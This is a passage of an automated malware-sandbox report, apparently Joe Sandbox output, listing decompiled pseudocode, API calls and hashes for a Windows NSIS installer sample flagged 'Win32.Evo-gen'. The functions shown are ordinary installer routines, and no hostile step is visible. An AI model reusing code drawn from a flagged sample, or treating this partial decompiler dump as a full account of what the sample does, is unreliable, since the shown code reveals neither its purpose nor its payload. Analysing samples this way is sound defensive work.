					if((_t29 |  *(_t35 - 0x50)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405EC8(_t34, _t34) >= 0) {
						_t14 = E00405E99(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsg51C2.tmp\System.dll",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                    0x004025ae
                                                    0x004025ae
                                                    0x004025ae
                                                    0x004025b3
                                                    0x004025b6
                                                    0x004025b9
                                                    0x004025be
                                                    0x004025c0
                                                    0x004025e0
                                                    0x0040261e
                                                    0x004025e2
                                                    0x004025e4
                                                    0x004025fe
                                                    0x00402609
                                                    0x00402609
                                                    0x004025c2
                                                    0x004025c4
                                                    0x004025c9
                                                    0x004025d7
                                                    0x004025da
                                                    0x00402623
                                                    0x00402626
                                                    0x004028a1
                                                    0x004028a1
                                                    0x0040262c
                                                    0x00402635
                                                    0x00402637
                                                    0x00402656
                                                    0x004015b4
                                                    0x004015b6
                                                    0x00000000
                                                    0x004015bc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00402637
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsg51C2.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsg51C2.tmp\System.dll,00000400,?,?,00000021), ref: 004025FE
                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg51C2.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsg51C2.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsg51C2.tmp\System.dll,00000400,?,?,00000021), ref: 00402609
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWidelstrlen
                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsg51C2.tmp$C:\Users\user\AppData\Local\Temp\nsg51C2.tmp\System.dll
                                                    • API String ID: 3109718747-390030559
                                                    • Opcode ID: 51f2f3aeac18c7b4381857229b0715218822d20d10da96ed9bdc8e702d0cde21
                                                    • Instruction ID: 0226f840347654c2ecdc96a32175c32971a63fe26a5c545fd31e5d705646dbf5
                                                    • Opcode Fuzzy Hash: 51f2f3aeac18c7b4381857229b0715218822d20d10da96ed9bdc8e702d0cde21
                                                    • Instruction Fuzzy Hash: CE11C872A05714BADB106BB18E8999E7765AF00359F20453FF102F61C1DAFC8982575E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                    0x10001619
                                                    0x10001625
                                                    0x10001632
                                                    0x10001639
                                                    0x10001642
                                                    0x1000164e

                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                    • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                    • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39674247886.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000001.00000002.39674168804.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674313518.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674359830.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                    • String ID:
                                                    • API String ID: 1148316912-0
                                                    • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                    • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                    • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                    • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405BC6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E00405BC6(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                    0x00405bc7
                                                    0x00405bd4
                                                    0x00405bd5
                                                    0x00405be0
                                                    0x00405be8
                                                    0x00405be8
                                                    0x00405bf0

                                                    APIs
                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BCC
                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BD6
                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405BE8
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC6
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CharPrevlstrcatlstrlen
                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                    • API String ID: 2659869361-3355392842
                                                    • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                    • Instruction ID: 65d0506ad812cb1a76e9921ecf3bea8c464967d5314b17a54056b3388df28152
                                                    • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                    • Instruction Fuzzy Hash: 41D05E31101535AAC2117B44AC04CDB66AC9E46304342487EF541B60A9C77C696296EE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403969 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00403969() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2bc
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2c8
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039C6();
				return E00405A03(_t11, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\nsg51C2.tmp", 7);
			}






                                                    0x00403969
                                                    0x00403978
                                                    0x0040397b
                                                    0x0040397d
                                                    0x0040397d
                                                    0x00403984
                                                    0x0040398c
                                                    0x0040398f
                                                    0x00403991
                                                    0x00403991
                                                    0x00403991
                                                    0x00403998
                                                    0x004039aa

                                                    APIs
                                                    • CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040397B
                                                    • CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040398F
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040396E
                                                    • C:\Users\user\AppData\Local\Temp\nsg51C2.tmp, xrefs: 0040399F
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsg51C2.tmp
                                                    • API String ID: 2962429428-3898541033
                                                    • Opcode ID: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
                                                    • Instruction ID: b4aeda79ce9169ff0691def1b455dd989f45c243b0b2f58971613af12f624ab5
                                                    • Opcode Fuzzy Hash: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
                                                    • Instruction Fuzzy Hash: 07E02CB080070492C130AF3CAE4D8853A285F4133A720432BF038F20F0C7788AAB0EA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403D31 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00403D31(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = L"1033";
				_t13 = 0xffff;
				_t6 = E00406172(__ecx, L"1033");
				while(1) {
					_t26 =  *0x42a284;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x42a250 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42a280;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x429220 = _t18[1];
					 *0x42a2e8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42921c = _t23;
						E00406159(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextW( *0x423708, E00406234(_t13, _t24, _t26, 0x429240, 0xfffffffe));
						_t11 =  *0x42a26c;
						_t27 =  *0x42a268;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00406234(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x818;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                    0x00403d35
                                                    0x00403d3a
                                                    0x00403d40
                                                    0x00403d45
                                                    0x00403d45
                                                    0x00403d4d
                                                    0x00000000
                                                    0x00000000
                                                    0x00403d55
                                                    0x00403d5d
                                                    0x00403d5f
                                                    0x00403d65
                                                    0x00403d65
                                                    0x00403d67
                                                    0x00403d73
                                                    0x00000000
                                                    0x00000000
                                                    0x00403d77
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403d79
                                                    0x00403d7e
                                                    0x00403d87
                                                    0x00403d8d
                                                    0x00403d92
                                                    0x00403da6
                                                    0x00403db1
                                                    0x00403dc9
                                                    0x00403dcf
                                                    0x00403dd4
                                                    0x00403ddc
                                                    0x00403dfd
                                                    0x00403dfd
                                                    0x00403dfd
                                                    0x00403dde
                                                    0x00403de0
                                                    0x00403de0
                                                    0x00403de4
                                                    0x00403deb
                                                    0x00403deb
                                                    0x00403df0
                                                    0x00403df6
                                                    0x00403df6
                                                    0x00000000
                                                    0x00403de0
                                                    0x00403d94
                                                    0x00403d99
                                                    0x00403da2
                                                    0x00403d9b
                                                    0x00403d9b
                                                    0x00403d9b
                                                    0x00403d99

                                                    APIs
                                                    • SetWindowTextW.USER32(00000000,00429240), ref: 00403DC9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: TextWindow
                                                    • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe"$1033
                                                    • API String ID: 530164218-2275912899
                                                    • Opcode ID: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
                                                    • Instruction ID: 03976cd0908ed948c9bf00cc325fcd7bd37552fd0e89046400bf063f4d175d83
                                                    • Opcode Fuzzy Hash: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
                                                    • Instruction Fuzzy Hash: 5D11D131B44210DBC734AF15DC80A377BADEF85715B2841BFE8016B3A1DB3A9D0386A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405CCE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E00405CCE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406212(0x425f30, _a4);
				_t21 = E00405C71(0x425f30);
				if(_t21 != 0) {
					E004064A6(_t21);
					if(( *0x42a258 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f30 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f30);
							_push(0x425f30);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406555();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C12(0x425f30);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BC6();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                    0x00405cda
                                                    0x00405ce5
                                                    0x00405ce9
                                                    0x00405cf0
                                                    0x00405cfc
                                                    0x00405d0c
                                                    0x00405d0e
                                                    0x00405d26
                                                    0x00405d27
                                                    0x00405d2e
                                                    0x00405d2f
                                                    0x00000000
                                                    0x00000000
                                                    0x00405d12
                                                    0x00405d19
                                                    0x00405d21
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405d19
                                                    0x00405d31
                                                    0x00000000
                                                    0x00405d45
                                                    0x00405cfe
                                                    0x00405d04
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405d04
                                                    0x00405ceb
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                      • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30,75F23420,?,75F22EE0,00405A23,?,75F23420,75F22EE0,00000000), ref: 00405C7F
                                                      • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
                                                      • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
                                                    • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,75F23420,?,75F22EE0,00405A23,?,75F23420,75F22EE0,00000000), ref: 00405D27
                                                    • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,75F23420,?,75F22EE0,00405A23,?,75F23420,75F22EE0), ref: 00405D37
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                    • String ID: 0_B
                                                    • API String ID: 3248276644-2128305573
                                                    • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                    • Instruction ID: ff48dfae10af5decf38b12d619470e329e8f167eeffaec785d8039fb28d6ac4e
                                                    • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                    • Instruction Fuzzy Hash: 6DF04439108F612AE622323A2D08ABF1A14CF8236474A423FF851B12D1CB3C8D43DC6E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405C12 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00405C12(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                    0x00405c13
                                                    0x00405c1d
                                                    0x00405c20
                                                    0x00405c26
                                                    0x00405c27
                                                    0x00405c28
                                                    0x00405c30
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405c30
                                                    0x00405c32
                                                    0x00405c3a

                                                    APIs
                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe,80000000,00000003), ref: 00405C18
                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe,80000000,00000003), ref: 00405C28
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CharPrevlstrlen
                                                    • String ID: C:\Users\user\Desktop
                                                    • API String ID: 2709904686-3370423016
                                                    • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                    • Instruction ID: 7c763ee06e751a121eeaaae5fe0630bfdebb5bec0d299de236eb7caac3423831
                                                    • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                    • Instruction Fuzzy Hash: BCD05EB2404A249ED322A704ED0499F67A8EF12300786886AE440A6165D7789C8186AD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}





















                                                    0x100010e6
                                                    0x100010f0
                                                    0x100010ff
                                                    0x1000110e
                                                    0x10001119
                                                    0x1000111c
                                                    0x1000112b
                                                    0x1000112f
                                                    0x10001131
                                                    0x100011d8
                                                    0x100011de
                                                    0x10001137
                                                    0x10001138
                                                    0x10001138
                                                    0x1000113d
                                                    0x1000113e
                                                    0x10001140
                                                    0x10001143
                                                    0x1000120d
                                                    0x10001210
                                                    0x100011b0
                                                    0x100011b6
                                                    0x100011bf
                                                    0x100011c4
                                                    0x100011c7
                                                    0x00000000
                                                    0x100011c7
                                                    0x10001212
                                                    0x10001214
                                                    0x10001196
                                                    0x1000119d
                                                    0x100011a5
                                                    0x00000000
                                                    0x100011a5
                                                    0x10001161
                                                    0x10001162
                                                    0x1000116a
                                                    0x10001177
                                                    0x1000117f
